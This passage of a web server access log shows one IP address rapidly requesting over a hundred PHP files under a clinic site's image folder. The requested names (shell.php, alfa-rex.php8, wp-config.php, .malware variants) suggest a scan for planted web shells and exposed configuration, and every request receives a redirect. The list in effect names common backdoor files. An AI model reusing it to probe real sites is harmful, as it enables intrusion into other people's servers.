10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:50 -0400] "GET /our-clinics/img/icons/caminho-ranger-32.php HTTP/1.1" 301 279 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:50 -0400] "GET /our-clinics/img/icons/about.php HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:50 -0400] "GET /our-clinics/img/icons/wp-configs.php HTTP/1.1" 301 272 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:51 -0400] "GET /our-clinics/img/icons/hplfuns.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:51 -0400] "GET /our-clinics/img/icons/dashboard.php HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:52 -0400] "GET /our-clinics/img/icons/yeniurun.php HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:52 -0400] "GET /our-clinics/img/icons/accesson.php HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:52 -0400] "GET /our-clinics/img/icons/about.php7 HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:53 -0400] "GET /our-clinics/img/icons/webstand.php HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:53 -0400] "GET /our-clinics/img/icons/gdftps.php HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:54 -0400] "GET /our-clinics/img/icons/unzipper.php HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:54 -0400] "GET /our-clinics/img/icons/orvxmailer.php HTTP/1.1" 301 272 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:55 -0400] "GET /our-clinics/img/icons/urun.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:55 -0400] "GET /our-clinics/img/icons/delpaths.php HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:55 -0400] "GET /our-clinics/img/icons/t.php7 HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:56 -0400] "GET /our-clinics/img/icons/mailer.php7 HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:56 -0400] "GET /our-clinics/img/icons/438bd8678657644bbecd39b496eb4fcdRCakc.php HTTP/1.1" 301 299 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:57 -0400] "GET /our-clinics/img/icons/wp-load.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:57 -0400] "GET /our-clinics/img/icons/logs.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:57 -0400] "GET /our-clinics/img/icons/blackrock.php HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:58 -0400] "GET /our-clinics/img/icons/ol.php7 HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:58 -0400] "GET /our-clinics/img/icons/mailer.php HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:59 -0400] "GET /our-clinics/img/icons/xmlrpc.php HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:59 -0400] "GET /our-clinics/img/icons/wp-links-opml.php HTTP/1.1" 301 275 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:00 -0400] "GET /our-clinics/img/icons/security.php HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:00 -0400] "GET /our-clinics/img/icons/inputs.php HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:00 -0400] "GET /our-clinics/img/icons/Wp-demand.php HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:01 -0400] "GET /our-clinics/img/icons/shell.php7 HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:01 -0400] "GET /our-clinics/img/icons/t.php HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:02 -0400] "GET /our-clinics/img/icons/wp-signup.php HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:02 -0400] "GET /our-clinics/img/icons/.test.php HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:02 -0400] "GET /our-clinics/img/icons/plugin.php HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:03 -0400] "GET /our-clinics/img/icons/sell.php8 HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:03 -0400] "GET /our-clinics/img/icons/moddofuns.php HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:04 -0400] "GET /our-clinics/img/icons/a58cd4184bdfa051c0646b369bc1ad02akc1.php HTTP/1.1" 301 298 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:04 -0400] "GET /our-clinics/img/icons/wp-mail.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:05 -0400] "GET /our-clinics/img/icons/wp-trackback.php HTTP/1.1" 301 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:05 -0400] "GET /our-clinics/img/icons/wp-blog-header.php HTTP/1.1" 301 276 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:05 -0400] "GET /our-clinics/img/icons/send.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:06 -0400] "GET /our-clinics/img/icons/style.php HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:06 -0400] "GET /our-clinics/img/icons/default.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:07 -0400] "GET /our-clinics/img/icons/alfa-rex.php8 HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:07 -0400] "GET /our-clinics/img/icons/system_log.php HTTP/1.1" 301 272 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:07 -0400] "GET /our-clinics/img/icons/wp-login.php.malware HTTP/1.1" 301 278 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:08 -0400] "GET /our-clinics/img/icons/xsox.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:08 -0400] "GET /our-clinics/img/icons/memberfuns.php HTTP/1.1" 301 272 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:09 -0400] "GET /our-clinics/img/icons/man.php7 HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:09 -0400] "GET /our-clinics/img/icons/alfa-rex.PhP7 HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:10 -0400] "GET /our-clinics/img/icons/options-reading.php HTTP/1.1" 301 277 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:10 -0400] "GET /our-clinics/img/icons/spinstall0.aspx HTTP/1.1" 301 273 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:10 -0400] "GET /our-clinics/img/icons/wp-activate.php HTTP/1.1" 301 273 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:11 -0400] "GET /our-clinics/img/icons/wp-cron.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:11 -0400] "GET /our-clinics/img/icons/index.html HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:12 -0400] "GET /our-clinics/img/icons/network.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:12 -0400] "GET /our-clinics/img/icons/classwithtostring.php HTTP/1.1" 301 279 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:13 -0400] "GET /our-clinics/img/icons/sell.php7 HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:13 -0400] "GET /our-clinics/img/icons/zwso.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:13 -0400] "GET /our-clinics/img/icons/php8.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:14 -0400] "GET /our-clinics/img/icons/akc.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:14 -0400] "GET /our-clinics/img/icons/onclickfuns.php HTTP/1.1" 301 273 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:15 -0400] "GET /our-clinics/img/icons/3z3z.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:15 -0400] "GET /our-clinics/img/icons/shell.php HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:15 -0400] "GET /our-clinics/img/icons/upload.php HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:16 -0400] "GET /our-clinics/img/icons/engine.php HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:16 -0400] "GET /our-clinics/img/icons/service.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:17 -0400] "GET /our-clinics/img/icons/.well-known HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:17 -0400] "GET /our-clinics/img/icons/src.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:18 -0400] "GET /our-clinics/img/icons/function.php HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:18 -0400] "GET /our-clinics/img/icons/orm.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:18 -0400] "GET /our-clinics/img/icons/M3tri-control.php HTTP/1.1" 301 275 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:19 -0400] "GET /our-clinics/img/icons/filefuns.php HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:19 -0400] "GET /our-clinics/img/icons/cloud.html HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:20 -0400] "GET /our-clinics/img/icons/phpzipincs.php HTTP/1.1" 301 272 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:20 -0400] "GET /our-clinics/img/icons/config.php HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:20 -0400] "GET /our-clinics/img/icons/data.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:21 -0400] "GET /our-clinics/img/icons/e.php HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:21 -0400] "GET /our-clinics/img/icons/wp-config.php HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:22 -0400] "GET /our-clinics/img/icons/wp-config-sample.php HTTP/1.1" 301 278 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:22 -0400] "GET /our-clinics/img/icons/file.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:23 -0400] "GET /our-clinics/img/icons/php.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:23 -0400] "GET /our-clinics/img/icons/as.php HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:23 -0400] "GET /our-clinics/img/icons/sell.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:24 -0400] "GET /our-clinics/img/icons/mmm.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:24 -0400] "GET /our-clinics/img/icons/xmlrpc.php.malware HTTP/1.1" 301 276 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:25 -0400] "GET /our-clinics/img/icons/buy.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:25 -0400] "GET /our-clinics/img/icons/alfa-rex.PHP HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:25 -0400] "GET /our-clinics/img/icons/wp-app.php HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:26 -0400] "GET /our-clinics/img/icons/fix.php7 HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:26 -0400] "GET /our-clinics/img/icons/fix.php8 HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:27 -0400] "GET /our-clinics/img/icons/wp-trackback.php.malware HTTP/1.1" 301 282 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:27 -0400] "GET /our-clinics/img/icons/8phpactual.php HTTP/1.1" 301 272 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:28 -0400] "GET /our-clinics/img/icons/wp.php HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:28 -0400] "GET /our-clinics/img/icons/1.php HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:28 -0400] "GET /our-clinics/img/icons/r.php HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:29 -0400] "GET /our-clinics/img/icons/mail.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:29 -0400] "GET /our-clinics/img/icons/stats.php HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:36:30 -0400] "GET 